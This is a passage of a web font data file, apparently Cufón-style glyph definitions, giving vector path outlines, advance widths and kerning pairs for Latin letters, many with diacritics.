6,62,75,62v31,0,65,-9,65,-46v0,-71,-165,-25,-165,-119v0,-52,46,-75,93,-75v53,0,93,24,95,81xm97,50r0,-32r40,0v3,33,-2,61,-35,58r0,-13v15,-4,14,-9,14,-13r-19,0","w":233},{"d":"55,-257r0,37r-30,0r0,-37r30,0xm25,0r0,-186r30,0r0,186r-30,0","w":79},{"d":"169,-54v-3,42,-35,56,-76,58v-3,5,-12,11,-11,16v18,-9,43,2,42,24v-2,36,-50,37,-78,25r7,-16v12,7,42,8,44,-7v1,-12,-22,-13,-32,-8v-13,-13,7,-23,13,-34v-38,-3,-65,-21,-67,-63r31,0v1,27,25,36,50,36v19,0,45,-4,45,-27v0,-48,-122,-16,-122,-88v0,-37,37,-52,70,-52v42,0,73,13,76,58r-31,0v-2,-24,-23,-31,-43,-31v-18,0,-39,4,-39,23v10,47,125,18,121,86","w":180},{"d":"31,0r0,-186r29,0r0,29v13,-23,34,-33,61,-33v94,-2,56,109,64,190r-31,0r0,-126v0,-23,-14,-37,-37,-37v-76,-1,-51,94,-55,163r-31,0xm5,-257r0,-32r40,0v3,34,-3,60,-36,58r0,-13v15,-4,15,-9,15,-13r-19,0","w":208},{"d":"8,0r0,-23r112,-136r-105,0r0,-27r145,0r0,21r-114,138r119,0r0,27r-157,0xm141,-264r-37,52r-34,0r-37,-52r30,0r25,35r25,-35r28,0","w":172},{"d":"0,-86r0,-28r180,0r0,28r-180,0","w":180},{"d":"48,-140v10,47,121,18,121,86v0,45,-41,58,-79,58v-42,0,-77,-17,-79,-63r31,0v1,27,25,36,50,36v19,0,45,-4,45,-27v0,-48,-122,-16,-122,-88v0,-37,37,-52,70,-52v42,0,73,13,76,58r-31,0v-2,-24,-23,-31,-43,-31v-18,0,-39,4,-39,23xm37,-212r37,-52r34,0r37,52r-30,0r-25,-35r-25,35r-28,0","w":180},{"d":"17,-42r0,-25r182,0r0,25r-182,0xm199,-140r0,25r-182,0r0,-25r182,0","w":216},{"d":"196,-10v-46,45,-117,-24,-162,14r-17,-24v31,-18,52,-59,31,-98r-31,0r0,-16r21,0v-10,-16,-17,-33,-17,-56v0,-46,38,-73,82,-73v53,0,86,31,85,93r-31,0v-1,-42,-17,-66,-52,-66v-58,0,-62,68,-33,102r57,0r0,16r-49,0v20,39,-7,75,-35,95v12,0,25,-11,39,-10v36,2,69,25,96,-1"},{"d":"125,6v-63,-2,-98,-33,-98,-99r0,-164r34,0r0,164v0,46,25,70,71,70v102,0,58,-144,67,-234r34,0v-7,110,35,259,-90,263v-10,9,-26,27,-23,36v-3,21,30,19,36,5r11,6v-10,17,-24,23,-39,23v-49,1,-35,-54,-3,-70","w":259},{"d":"185,-257r0,313r-24,0r0,-293r-44,0r0,293r-24,0r0,-172v-44,0,-76,-30,-76,-67v0,-47,31,-74,82,-74r86,0","w":216},{"d":"181,-126r-32,0v-5,-23,-20,-37,-46,-37v-44,0,-58,35,-58,72v0,35,16,68,55,68v30,0,47,-17,51,-45r31,0v-7,46,-35,72,-82,72v-57,0,-87,-39,-87,-95v0,-56,29,-99,88,-99v42,0,75,20,80,64xm117,-255r0,38r-32,0r0,-38r32,0","w":193},{"d":"101,-206r9,-51r39,0r-27,51r-21,0xm66,-242r0,56r37,0r0,27r-37,0r0,115v-4,19,18,17,37,17r0,27v-40,0,-68,3,-68,-41r0,-118r-32,0r0,-27r32,0r0,-56r31,0","w":130},{"d":"25,0r0,-116r-25,20r0,-25r25,-20r0,-116r30,0r0,91r26,-20r0,26r-26,20r0,140r-30,0","w":79},{"d":"28,0r0,-257r34,0r0,110r136,0r0,-110r34,0r0,257r-34,0r0,-118r-136,0r0,118r-34,0xm75,-280r37,-52r34,0r37,52r-30,0r-25,-35r-25,35r-28,0","w":259},{"d":"28,0r0,-257r178,0r0,29r-144,0r0,81r134,0r0,29r-134,0r0,89r145,0r0,29r-179,0xm170,-332r-37,52r-33,0r-38,-52r31,0r24,35r26,-35r27,0","w":219},{"d":"8,0r0,-23r112,-136r-105,0r0,-27r145,0r0,21r-114,138r119,0r0,27r-157,0xm104,-255r0,38r-32,0r0,-38r32,0","w":172},{"d":"30,0r0,-257r34,0r0,257r-34,0xm63,-323r0,37r-32,0r0,-37r32,0","w":93},{"d":"25,0r0,-257r30,0r0,257r-30,0xm112,-186r0,37r-33,0r0,-37r33,0","w":125},{"d":"45,-111r107,0v-2,-29,-22,-52,-53,-52v-32,0,-52,23,-54,52xm152,-59r30,0v-8,41,-38,63,-80,63v-59,0,-89,-41,-89,-98v0,-56,36,-96,87,-96v66,0,87,61,85,106r-140,0v-1,32,17,61,58,61v26,0,44,-12,49,-36xm153,-264r-37,52r-33,0r-38,-52r31,0r24,35r26,-35r27,0","w":193},{"d":"188,-24r0,23v-18,9,-51,7,-48,-23v-31,41,-126,42,-127,-24v0,-42,31,-51,63,-57v33,-7,63,-4,63,-27v0,-48,-90,-40,-88,4r-31,0v2,-46,37,-62,79,-62v33,0,70,7,70,51r0,95v-2,19,4,24,19,20xm81,-23v55,0,60,-27,57,-73v-24,18,-93,0,-93,46v0,20,17,27,36,27xm125,-218v-25,0,-58,-31,-69,1r-19,0v5,-22,16,-40,39,-40v26,0,56,33,66,-1r19,0v-3,18,-14,40,-36,40","w":193},{"d":"188,-24r0,23v-18,9,-51,7,-48,-23v-31,41,-126,42,-127,-24v0,-42,31,-51,63,-57v33,-7,63,-4,63,-27v0,-48,-90,-40,-88,4r-31,0v2,-46,37,-62,79,-62v33,0,70,7,70,51r0,95v-2,19,4,24,19,20xm81,-23v55,0,60,-27,57,-73v-24,18,-93,0,-93,46v0,20,17,27,36,27xm45,-212r37,-52r33,0r38,52r-31,0r-24,-35r-26,35r-27,0","w":193},{"d":"2,69r6,-16v12,7,43,8,45,-7v1,-12,-22,-13,-32,-8v-13,-14,10,-25,16,-38r15,0v-5,7,-11,12,-15,20v18,-9,44,2,43,24v-2,36,-50,37,-78,25","w":79},{"d":"8,0r0,-29r160,-199r-148,0r0,-29r188,0r0,29r-159,199r163,0r0,29r-204,0xm98,-280r31,-52r39,0r-47,52r-23,0","w":219},{"d":"48,-140v10,47,121,18,121,86v0,45,-41,58,-79,58v-42,0,-77,-17,-79,-63r31,0v1,27,25,36,50,36v19,0,45,-4,45,-27v0,-48,-122,-16,-122,-88v0,-37,37,-52,70,-52v42,0,73,13,76,58r-31,0v-2,-24,-23,-31,-43,-31v-18,0,-39,4,-39,23xm73,-212r31,-52r40,0r-48,52r-23,0","w":180},{"d":"23,0r0,-186r29,0v1,9,-2,22,1,29v13,-23,33,-33,60,-33v94,-2,56,109,64,190r-30,0r0,-126v0,-23,-15,-37,-38,-37v-76,-1,-51,94,-55,163r-31,0xm154,-264r-37,52r-33,0r-38,-52r31,0r25,35r25,-35r27,0"},{"d":"22,0r0,-186r29,0r0,39v15,-30,36,-44,69,-43r0,32v-81,-5,-66,83,-67,158r-31,0xm29,-212r31,-52r39,0r-47,52r-23,0","w":119,"k":{",":33,"-":20,".":33,"q":6,"e":6,"\u00e8":6,"\u00e9":6,"\u00ea":6,"\u00eb":6,"\u0113":6,"\u0115":6,"\u0117":6,"\u0119":6,"\u011b":6,"o":6,"\u00f2":6,"\u00f3":6,"\u00f4":6,"\u00f5":6,"\u00f6":6,"\u014d":6,"\u014f":6,"\u0151":6,"c":6,"\u00e7":6,"\u0107":6,"\u0109":6,"\u010b":6,"\u010d":6,"d":6,"\u010f":6,"g":10,"\u011d":10,"\u011f":10,"\u0121":10,"\u0123":10,"n":-6,"\u00f1":-6,"\u0144":-6,"\u0146":-6,"\u0148":-6,"\u0149":-6}},{"d":"-4,-210r0,-20r31,0r0,-27r30,0r0,27r51,0r0,20r-51,0v1,16,-2,37,1,51v10,-23,37,-31,59,-31v94,-2,56,109,64,190r-31,0r0,-126v0,-23,-15,-37,-38,-37v-76,-1,-51,94,-55,163r-30,0r0,-210r-31,0","w":203},{"d":"98,-210r0,-20r61,0r0,-27r30,0r0,27r31,0r0,20r-31,0r0,210r-30,0v-1,-8,2,-19,-1,-25v-10,21,-33,29,-59,29v-57,0,-86,-45,-86,-98v0,-82,94,-130,146,-67r0,-49r-61,0xm45,-91v0,35,18,68,58,68v41,0,57,-35,57,-70v0,-36,-17,-70,-59,-70v-42,0,-56,36,-56,72","w":217},{"d":"25,0r0,-257r30,0r0,257r-30,0xm25,-280r31,-52r39,0r-47,52r-23,0","w":79},{"d":"152,1v-8,-5,-12,-12,-12,-25v-31,41,-126,42,-127,-24v0,-42,31,-51,63,-57v33,-7,63,-4,63,-27v0,-48,-90,-40,-88,4r-31,0v2,-46,37,-62,79,-62v33,0,70,7,70,51r0,95v-2,19,4,24,19,20r0,23v-10,6,-30,3,-35,15v-12,12,-15,20,-15,28v-3,21,30,19,36,5r11,6v-10,17,-24,23,-39,23v-9,0,-33,-1,-33,-30v-3,-9,22,-40,39,-45xm81,-23v55,0,60,-27,57,-73v-24,18,-93,0,-93,46v0,20,17,27,36,27","w":193},{"d":"55,0r-30,0r0,-186r30,0r0,186","w":79},{"d":"55,-186r0,186v-22,21,-27,31,-27,42v-2,20,27,20,33,5r10,6v-9,17,-22,23,-35,23v-8,0,-30,-1,-30,-30v0,-6,5,-26,36,-46r-17,0r0,-186r30,0xm55,-257r0,37r-30,0r0,-37r30,0","w":79},{"d":"199,-140r0,101r-25,0r0,-76r-157,0r0,-25r182,0","w":216},{"d":"18,-86r0,-28r104,0r0,28r-104,0","w":140},{"d":"117,-226v-17,38,-29,81,-45,120r87,0xm-3,0r101,-257r38,0r100,257r-38,0r-28,-77r-108,0r-29,77r-36,0xm60,-331r18,0v6,20,19,30,40,30v21,0,29,-12,36,-30r18,0v-5,31,-24,50,-56,50v-33,0,-51,-18,-56,-50","w":233,"k":{"v":6,"V":17,"\u2019":27,"T":33,"\u0162":33,"\u0164":33,"\u021a":33,"W":9,"\u0174":9,"Y":27,"\u00dd":27,"\u0176":27,"\u0178":27,"w":6,"\u0175":6,"y":6,"\u00fd":6,"\u00ff":6,"\u0177":6}},{"d":"22,0r0,-186r29,0r0,39v15,-30,36,-44,69,-43r0,32v-81,-5,-66,83,-67,158r-31,0xm123,-264r-37,52r-33,0r-38,-52r31,0r25,35r25,-35r27,0","w":119,"k":{",":33,"-":20,".":33,"q":6,"e":6,"\u00e8":6,"\u00e9":6,"\u00ea":6,"\u00eb":6,"\u0113":6,"\u0115":6,"\u0117":6,"\u0119":6,"\u011b":6,"o":6,"\u00f2":6,"\u00f3":6,"\u00f4":6,"\u00f5":6,"\u00f6":6,"\u014d":6,"\u014f":6,"\u0151":6,"c":6,"\u00e7":6,"\u0107":6,"\u0109":6,"\u010b":6,"\u010d":6,"d":6,"\u010f":6,"g":10,"\u011d":10,"\u011f":10,"\u0121":10,"\u0123":10,"n":-6,"\u00f1":-6,"\u0144":-6,"\u0146":-6,"\u0148":-6,"\u0149":-6}},{"d":"47,-86r0,-28r266,0r0,28r-266,0","w":360},{"d":"28,0r0,-257r34,0r0,228r136,0r0,29r-170,0xm33,-280r31,-52r40,0r-47,52r-24,0","k":{"V":33,"\u2019":27,"T":33,"\u0162":33,"\u0164":33,"\u021a":33,"W":20,"\u0174":20,"Y":40,"\u00dd":40,"\u0176":40,"\u0178":40,"y":13,"\u00fd":13,"\u00ff":13,"\u0177":13}},{"d":"23,0r0,-186r29,0v1,9,-2,22,1,29v13,-23,33,-33,60,-33v94,-2,56,109,64,190r-30,0r0,-126v0,-23,-15,-37,-38,-37v-76,-1,-51,94,-55,163r-31,0"},{"d":"28,0r0,-257r34,0r0,228r136,0r0,29r-170,0xm101,-206r9,-51r39,0r-27,51r-21,0","k":{"V":33,"\u2019":27,"T":33,"\u0162":33,"\u0164":33,"\u021a":33,"W":20,"\u0174":20,"Y":40,"\u00dd":40,"\u0176":40,"\u0178":40,"y":13,"\u00fd":13,"\u00ff":13,"\u0177":13}},{"d":"66,-242r0,56r37,0r0,27r-37,0r0,115v-4,19,18,17,37,17r0,27v-40,0,-68,3,-68,-41r0,-118r-32,0r0,-27r32,0r0,-56r31,0xm47,50r0,-32r40,0v3,34,-3,60,-36,58r0,-13v15,-4,15,-9,15,-13r-19,0","w":113},{"d":"267,-186r-60,186r-32,0r-39,-148r-37,148r-33,0r-60,-186r34,0r43,152r37,-152r34,0r39,152r42,-152r32,0xm84,-212r37,-52r33,0r38,52r-30,0r-25,-35r-25,35r-28,0","w":272,"k":{",":20,".":20}},{"d":"78,-120r0,-26v33,5,62,-9,62,-41v0,-27,-19,-41,-45,-41v-33,0,-48,25,-48,55r-31,0v2,-49,28,-82,79,-82v44,0,78,21,78,68v1,24,-17,41,-35,52v31,7,46,31,46,62v0,51,-40,77,-88,77v-52,0,-86,-30,-85,-83r30,0v1,33,20,56,55,56v30,0,55,-18,55,-49v0,-39,-33,-54,-73,-48"},{"d":"28,0r0,-257r34,0r0,228r136,0r0,29r-170,0xm144,-186r0,37r-33,0r0,-37r33,0","k":{"V":33,"\u2019":27,"T":33,"\u0162":33,"\u0164":33,"\u021a":33,"W":20,"\u0174":20,"Y":40,"\u00dd":40,"\u0176":40,"\u0178":40,"y":13,"\u00fd":13,"\u00ff":13,"\u0177":13}},{"d":"198,0v-17,-27,9,-110,-52,-110r-84,0r0,110r-34,0r0,-257r121,0v87,-9,105,110,34,132v56,12,26,87,53,125r-38,0xm62,-139v57,-4,128,17,131,-45v3,-58,-77,-42,-131,-44r0,89xm102,-280r31,-52r39,0r-47,52r-23,0","w":246,"k":{"V":6,"T":6,"\u0162":6,"\u0164":6,"\u021a":6,"W":6,"\u0174":6,"Y":13,"\u00dd":13,"\u0176":13,"\u0178":13}},{"d":"30,0r0,-40r40,0r0,40r-40,0","w":100},{"d":"209,-182r-32,0v-4,-37,-28,-52,-64,-52v-29,0,-58,11,-58,44v0,63,165,18,165,119v0,55,-53,77,-100,77v-58,0,-107,-29,-107,-91r33,0v0,43,36,62,75,62v31,0,65,-9,65,-46v0,-71,-165,-25,-165,-119v0,-52,46,-75,93,-75v53,0,93,24,95,81xm171,-332r-37,52r-33,0r-38,-52r31,0r24,35r26,-35r27,0","w":233},{"d":"25,0r0,-257r30,0r0,152r85,-81r41,0r-73,68r79,118r-39,0r-64,-97r-29,26r0,71r-30,0xm78,50r0,-32r40,0v3,34,-3,60,-36,58r0,-13v15,-4,15,-9,15,-13r-19,0","w":186},{"d":"188,-24r0,23v-18,9,-51,7,-48,-23v-31,41,-126,42,-127,-24v0,-42,31,-51,63,-57v33,-7,63,-4,63,-27v0,-48,-90,-40,-88,4r-31,0v2,-46,37,-62,79,-62v33,0,70,7,70,51r0,95v-2,19,4,24,19,20xm81,-23v55,0,60,-27,57,-73v-24,18,-93,0,-93,46v0,20,17,27,36,27xm98,-212r-48,-52r40,0r31,52r-23,0","w":193},{"d":"24,71r0,-257r31,0r0,25v10,-21,34,-29,60,-29v57,0,86,44,86,97v0,53,-28,97,-85,97v-19,0,-48,-7,-61,-29r0,96r-31,0xm168,-95v0,-35,-17,-68,-57,-68v-41,0,-57,35,-57,70v0,36,16,70,58,70v42,0,56,-36,56,-72","w":213},{"d":"329,-257r-69,257r-35,0r-60,-216r-59,216r-36,0r-66,-257r35,0r51,214r58,-214r37,0r58,214r52,-214r34,0","w":333,"k":{":":6,",":27,".":27,";":6,"A":9,"\u00c0":9,"\u00c1":9,"\u00c2":9,"\u00c3":9,"\u00c4":9,"\u0100":9,"\u0102":9,"\u0104":9,"a":13,"\u00e0":13,"\u00e1":13,"\u00e2":13,"\u00e3":13,"\u00e5":13,"\u0101":13,"\u0103":13,"\u0105":13,"e":21,"\u00e8":21,"\u00e9":21,"\u00ea":21,"\u00eb":21,"\u0113":21,"\u0115":21,"\u0117":21,"\u0119":21,"\u011b":21,"o":21,"\u00f2":21,"\u00f3":21,"\u00f4":21,"\u00f5":21,"\u00f6":21,"\u014d":21,"\u014f":21,"\u0151":21,"u":6,"\u00f9":6,"\u00fa":6,"\u00fb":6,"\u00fc":6,"\u0169":6,"\u016b":6,"\u016d":6,"\u016f":6,"\u0171":6,"\u0173":6,"r":6,"\u0155":6,"\u0157":6,"\u0159":6}},{"d":"0,0r89,-132r-84,-125r41,0r64,100r67,-100r38,0r-85,125r90,132r-41,0r-70,-106r-71,106r-38,0","w":219},{"d":"24,0r0,-257r31,0r0,96v10,-21,34,-29,60,-29v57,0,86,44,86,97v0,53,-28,97,-85,97v-19,0,-48,-7,-61,-29r0,25r-31,0xm168,-95v0,-35,-17,-68,-57,-68v-41,0,-57,35,-57,70v0,36,16,70,58,70v42,0,56,-36,56,-72","w":213},{"d":"137,-234v-121,1,-120,210,0,211v120,-1,120,-210,0,-211xm14,-129v0,-70,41,-134,123,-134v82,0,123,64,123,134v0,70,-41,135,-123,135v-82,0,-123,-65,-123,-135xm153,-280r29,-52r38,0r-44,52r-23,0xm96,-280r30,-52r37,0r-43,52r-24,0","w":273},{"d":"18,-62r30,0v3,25,23,39,47,39v36,0,59,-36,57,-99v-35,66,-140,31,-140,-50v0,-49,35,-83,84,-83v48,0,88,26,88,122v0,88,-27,137,-89,137v-43,0,-73,-22,-77,-66xm147,-170v0,-31,-18,-58,-52,-58v-36,0,-50,29,-50,60v0,28,20,54,50,54v32,0,52,-26,52,-56"},{"d":"28,0r0,-86r-28,20r0,-28r28,-20r0,-143r34,0r0,119r82,-58r0,28r-82,57r0,82r136,0r0,29r-170,0"},{"d":"30,0r0,-257r34,0r0,257r-34,0xm253,-257r0,193v0,35,-18,70,-76,70v-54,0,-79,-32,-75,-91r34,0v-1,35,4,62,41,62v31,0,42,-18,42,-46r0,-188r34,0","w":280},{"d":"0,45r0,-18r180,0r0,18r-180,0","w":180},{"d":"117,-226v-17,38,-29,81,-45,120r87,0xm-3,0r101,-257r38,0r100,257r-38,0r-28,-77r-108,0r-29,77r-36,0","w":233,"k":{"v":6,"V":17,"\u2019":27,"T":33,"\u0162":33,"\u0164":33,"\u021a":33,"W":9,"\u0174":9,"Y":27,"\u00dd":27,"\u0176":27,"\u0178":27,"w":6,"\u0175":6,"y":6,"\u00fd":6,"\u00ff":6,"\u0177":6}},{"d":"45,-91v0,35,18,68,58,68v41,0,57,-35,57,-70v0,-36,-17,-70,-59,-70v-42,0,-56,36,-56,72xm189,-186r0,257r-30,0r-1,-96v-10,21,-33,29,-59,29v-57,0,-86,-45,-86,-98v0,-82,94,-130,146,-67r0,-25r30,0","w":213},{"d":"188,-24r0,23v-18,9,-51,7,-48,-23v-31,41,-126,42,-127,-24v0,-42,31,-51,63,-57v33,-7,63,-4,63,-27v0,-48,-90,-40,-88,4r-31,0v2,-46,37,-62,79,-62v33,0,70,7,70,51r0,95v-2,19,4,24,19,20xm81,-23v55,0,60,-27,57,-73v-24,18,-93,0,-93,46v0,20,17,27,36,27","w":193},{"d":"48,-140v10,47,121,18,121,86v0,45,-41,58,-79,58v-42,0,-77,-17,-79,-63r31,0v1,27,25,36,50,36v19,0,45,-4,45,-27v0,-48,-122,-16,-122,-88v0,-37,37,-52,70,-52v42,0,73,13,76,58r-31,0v-2,-24,-23,-31,-43,-31v-18,0,-39,4,-39,23xm145,-264r-37,52r-33,0r-38,-52r30,0r25,35r25,-35r28,0","w":180},{"d":"23,0r0,-186r29,0v1,8,-2,21,1,27v22,-38,93,-46,111,0v25,-46,120,-44,120,23r0,136r-31,0r0,-122v0,-23,-6,-41,-36,-41v-72,-1,-42,99,-48,163r-31,0r0,-122v0,-24,-8,-41,-35,-41v-79,0,-40,93,-49,163r-31,0","w":307},{"d":"-10,-217r0,-37r32,0r0,37r-32,0xm58,-217r0,-37r32,0r0,37r-32,0","w":79},{"d":"0,-105r0,-20r35,0r0,-34r-32,0r0,-27r32,0r0,-56r31,0r0,56r37,0r0,27r-37,0r0,34r40,0r0,20r-40,0v6,35,-22,89,37,78r0,27v-40,0,-68,3,-68,-41r0,-64r-35,0","w":113},{"d":"128,-255r0,255r-30,0r0,-183r-67,0r0,-24v35,0,67,-9,74,-48r23,0"},{"d":"20,-263r106,269r-26,0r-106,-269r26,0","w":119},{"d":"35,-155r0,-20r51,0r0,-53r-85,0r0,-29r205,0r0,29r-85,0r0,53r51,0r0,20r-51,0r0,155r-35,0r0,-155r-51,0","w":206},{"d":"159,-257r0,193v0,35,-18,70,-76,70v-54,0,-79,-32,-75,-91r34,0v-1,36,5,62,42,62v31,0,41,-18,41,-46r0,-188r34,0","w":186},{"d":"25,0r0,-257r30,0r0,152r85,-81r41,0r-73,68r79,118r-39,0r-64,-97r-29,26r0,71r-30,0","w":186},{"d":"177,-186r-81,211v-17,44,-35,58,-75,46r0,-28v17,8,36,6,43,-12r13,-32r-74,-185r34,0r56,152r52,-152r32,0","w":180,"k":{",":27,".":27}},{"d":"36,0r0,-159r-32,0r0,-27r32,0v-8,-53,19,-85,71,-71r0,27v-18,-6,-41,-5,-41,18r0,26r36,0r0,27r-36,0r0,159r-30,0","w":106,"k":{"\u2019":-6,"f":6}},{"d":"23,0r0,-257r31,0r0,98v10,-23,37,-31,59,-31v94,-2,56,109,64,190r-30,0r0,-126v0,-23,-15,-37,-38,-37v-76,-1,-51,94,-55,163r-31,0"},{"d":"29,0r0,-257r47,0r81,216r81,-216r47,0r0,257r-33,0r0,-214r-81,214r-29,0r-81,-214r0,214r-32,0","w":313},{"d":"55,0r-30,0r0,-186r30,0r0,186xm66,-218v-25,0,-58,-31,-69,1r-18,0v5,-22,15,-40,38,-40v26,1,56,33,67,-1r18,0v-2,19,-14,40,-36,40","w":79},{"d":"45,-111r107,0v-2,-29,-22,-52,-53,-52v-32,0,-52,23,-54,52xm152,-59r30,0v-8,41,-38,63,-80,63v-59,0,-89,-41,-89,-98v0,-56,36,-96,87,-96v66,0,87,61,85,106r-140,0v-1,32,17,61,58,61v26,0,44,-12,49,-36xm117,-255r0,38r-32,0r0,-38r32,0","w":193},{"d":"45,-91v0,35,18,68,58,68v41,0,57,-35,57,-70v0,-36,-17,-70,-59,-70v-42,0,-56,36,-56,72xm189,-257r0,257r-30,0v-1,-8,2,-19,-1,-25v-10,21,-33,29,-59,29v-57,0,-86,-45,-86,-98v0,-82,94,-130,146,-67r0,-96r30,0","w":213},{"d":"229,0r-9,-32v-20,27,-52,38,-82,38v-77,0,-123,-62,-123,-129v0,-75,42,-140,123,-140v56,0,101,25,110,85r-34,0v-7,-39,-37,-56,-76,-56v-62,0,-88,54,-88,109v0,54,31,102,88,102v53,0,84,-37,82,-84r-82,0r0,-28r113,0r0,135r-22,0xm81,-331r18,0v6,20,19,30,40,30v21,0,29,-12,36,-30r18,0v-5,31,-25,50,-57,50v-33,0,-50,-18,-55,-50","w":273},{"d":"117,-226v-17,38,-29,81,-45,120r87,0xm-3,0r101,-257r38,0r100,257r-38,0r-28,-77r-108,0r-29,77r-36,0xm99,-280r31,-52r40,0r-48,52r-23,0","w":233,"k":{"v":6,"V":17,"\u2019":27,"T":33,"\u0162":33,"\u0164":33,"\u021a":33,"W":9,"\u0174":9,"Y":27,"\u00dd":27,"\u0176":27,"\u0178":27,"w":6,"\u0175":6,"y":6,"\u00fd":6,"\u00ff":6,"\u0177":6}},{"d":"39,-212r-47,-52r39,0r31,52r-23,0","w":79},{"d":"30,0r0,-257r34,0r0,257v-22,21,-27,31,-27,42v-1,22,25,19,32,5r10,6v-9,16,-20,23,-33,23v-7,0,-32,-1,-32,-30v0,-7,5,-26,37,-46r-21,0","w":93},{"d":"198,0v-17,-27,9,-110,-52,-110r-84,0r0,110r-34,0r0,-257r121,0v87,-9,105,110,34,132v56,12,26,87,53,125r-38,0xm62,-139v57,-4,128,17,131,-45v3,-58,-77,-42,-131,-44r0,89","w":246,"k":{"V":6,"T":6,"\u0162":6,"\u0164":6,"\u021a":6,"W":6,"\u0174":6,"Y":13,"\u00dd":13,"\u0176":13,"\u0178":13}},{"d":"137,-234v-121,1,-120,210,0,211v120,-1,120,-210,0,-211xm14,-129v0,-70,41,-134,123,-134v82,0,123,64,123,134v0,70,-41,135,-123,135v-82,0,-123,-65,-123,-135xm163,-287v-25,0,-58,-31,-68,2r-19,0v5,-22,15,-40,38,-40v26,0,57,32,67,-2r18,0v-2,19,-13,40,-36,40","w":273},{"d":"25,0r0,-257r30,0r0,257r-30,0xm20,50r0,-32r40,0v3,34,-3,60,-36,58r0,-13v15,-4,15,-9,15,-13r-19,0","w":79},{"d":"45,-111r107,0v-2,-29,-22,-52,-53,-52v-32,0,-52,23,-54,52xm152,-59r30,0v-8,41,-38,63,-80,63v-59,0,-89,-41,-89,-98v0,-56,36,-96,87,-96v66,0,87,61,85,106r-140,0v-1,32,17,61,58,61v26,0,44,-12,49,-36xm47,-212r37,-52r34,0r37,52r-30,0r-25,-35r-25,35r-28,0","w":193},{"d":"28,0r0,-257r34,0r0,228r136,0r0,29r-170,0","k":{"V":33,"\u2019":27,"T":33,"\u0162":33,"\u0164":33,"\u021a":33,"W":20,"\u0174":20,"Y":40,"\u00dd":40,"\u0176":40,"\u0178":40,"y":13,"\u00fd":13,"\u00ff":13,"\u0177":13}},{"d":"43,-9r-17,-17r65,-65r-65,-65r17,-18r65,65r65,-65r17,18r-64,65r65,65r-17,17r-66,-65","w":216},{"d":"97,71r-24,0v-72,-101,-76,-233,0,-334r24,0v-67,105,-64,228,0,334","w":93},{"d":"18,-95r78,-156r24,0r78,156r-25,0r-65,-130r-64,130r-26,0","w":216},{"d":"-6,6r106,-269r26,0r-106,269r-26,0","w":119},{"d":"28,0r0,-257r178,0r0,29r-144,0r0,81r134,0r0,29r-134,0r0,89r145,0r0,29r-179,0xm68,-285r0,-38r32,0r0,38r-32,0xm136,-285r0,-38r32,0r0,38r-32,0","w":219},{"d":"233,-257r-99,152r0,105r-34,0r0,-105r-99,-152r40,0r77,122r76,-122r39,0","w":233},{"d":"45,-111r107,0v-2,-29,-22,-52,-53,-52v-32,0,-52,23,-54,52xm152,-59r30,0v-8,41,-38,63,-80,63v-59,0,-89,-41,-89,-98v0,-56,36,-96,87,-96v66,0,87,61,85,106r-140,0v-1,32,17,61,58,61v26,0,44,-12,49,-36xm86,-212r31,-52r40,0r-48,52r-23,0","w":193},{"d":"209,-182r-32,0v-4,-37,-28,-52,-64,-52v-29,0,-58,11,-58,44v0,63,165,18,165,119v0,55,-53,77,-100,77v-58,0,-107,-29,-107,-91r33,0v0,43,36,62,75,62v31,0,65,-9,65,-46v0,-71,-165,-25,-165,-119v0,-52,46,-75,93,-75v53,0,93,24,95,81","w":233},{"d":"198,0v-17,-27,9,-110,-52,-110r-84,0r0,110r-34,0r0,-257r121,0v87,-9,105,110,34,132v56,12,26,87,53,125r-38,0xm62,-139v57,-4,128,17,131,-45v3,-58,-77,-42,-131,-44r0,89xm106,50r0,-32r40,0v3,33,-2,61,-35,58r0,-13v15,-4,14,-9,14,-13r-19,0","w":246,"k":{"V":6,"T":6,"\u0162":6,"\u0164":6,"\u021a":6,"W":6,"\u0174":6,"Y":13,"\u00dd":13,"\u0176":13,"\u0178":13}},{"d":"28,0r0,-257r34,0r0,110r136,0r0,-110r34,0r0,257r-34,0r0,-118r-136,0r0,118r-34,0","w":259},{"d":"198,0v-17,-27,9,-110,-52,-110r-84,0r0,110r-34,0r0,-257r121,0v87,-9,105,110,34,132v56,12,26,87,53,125r-38,0xm62,-139v57,-4,128,17,131,-45v3,-58,-77,-42,-131,-44r0,89xm177,-332r-37,52r-34,0r-37,-52r30,0r25,35r25,-35r28,0","w":246,"k":{"V":6,"T":6,"\u0162":6,"\u0164":6,"\u021a":6,"W":6,"\u0174":6,"Y":13,"\u00dd":13,"\u0176":13,"\u0178":13}},{"d":"55,-257r0,37r-30,0r0,-37r30,0xm25,0r0,-186r30,0r0,186r-30,0xm130,-257r0,37r-30,0r0,-37r30,0xm130,-186r0,210v0,39,-24,51,-60,46r0,-26v20,1,31,0,30,-25r0,-205r30,0","w":154},{"d":"177,-186r0,186r-29,0r0,-30v-13,23,-34,34,-61,34v-94,2,-56,-109,-64,-190r31,0r0,126v0,23,14,37,37,37v77,1,52,-93,56,-163r30,0xm59,-245v0,-22,19,-40,41,-40v22,0,41,18,41,40v0,22,-19,40,-41,40v-22,0,-41,-18,-41,-40xm76,-245v0,14,10,25,24,25v14,0,24,-11,24,-25v0,-14,-10,-24,-24,-24v-14,0,-24,10,-24,24"},{"d":"28,0r0,-257r169,0r0,29r-135,0r0,81r118,0r0,29r-118,0r0,118r-34,0","w":206,"k":{".":57,",":57,"A":20,"\u00c0":20,"\u00c1":20,"\u00c2":20,"\u00c3":20,"\u00c4":20,"\u0100":20,"\u0102":20,"\u0104":20}},{"d":"233,-257r-99,152r0,105r-34,0r0,-105r-99,-152r40,0r77,122r76,-122r39,0xm68,-285r0,-38r32,0r0,38r-32,0xm136,-285r0,-38r32,0r0,38r-32,0","w":233},{"d":"169,-251r0,27r-103,0r-13,74v50,-41,130,-10,130,69v0,43,-30,85,-89,85v-44,0,-80,-27,-81,-73r30,0v2,26,23,46,54,46v29,0,54,-20,54,-60v0,-57,-77,-77,-105,-34r-27,-1r24,-133r126,0"},{"d":"30,-217r0,-40r40,0v2,44,1,92,-40,93r0,-18v16,0,21,-18,21,-35r-21,0","w":100,"k":{"\u2019":34}},{"d":"27,0r0,-40r40,0r0,40r-40,0xm64,-257v2,68,-4,130,-9,191r-16,0r-9,-112r0,-79r34,0","w":93},{"d":"30,0r0,-257r34,0r0,257r-34,0xm72,-287v-25,0,-58,-31,-68,2r-19,0v5,-22,15,-40,38,-40v26,0,57,32,67,-2r19,0v-3,19,-14,40,-37,40","w":93},{"d":"17,3r0,-25r153,-69r-153,-70r0,-24r182,83r0,22","w":216},{"d":"149,-94v0,-34,-9,-69,-51,-69v-70,1,-74,139,0,140v41,0,51,-38,51,-71xm176,-111r103,0v0,-32,-19,-52,-51